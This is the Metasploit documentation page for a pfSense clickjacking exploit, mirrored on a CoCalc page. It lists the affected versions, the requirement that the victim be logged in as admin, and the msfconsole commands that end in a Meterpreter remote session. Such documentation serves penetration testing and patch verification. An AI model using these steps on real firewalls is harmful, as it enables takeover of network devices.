CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/unix/http/pfsense_clickjacking.md
Views: 1904
Vulnerable Application
This vulnerability affects any pfSense versions prior to 2.4.2-RELEASE.
Vulnerable Setup
The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.
Verification Steps
use exploit/unix/http/pfsense_clickjacking
set TARGETURI https://<ip WebGUI>
exploit
Browse to the URL returned by MSF
Click anywhere on the returned page
Note that a new Meterpreter sessions was started.
Options
TARGETURI
The base path of the WebGUI. The default base path is https://192.168.1.1/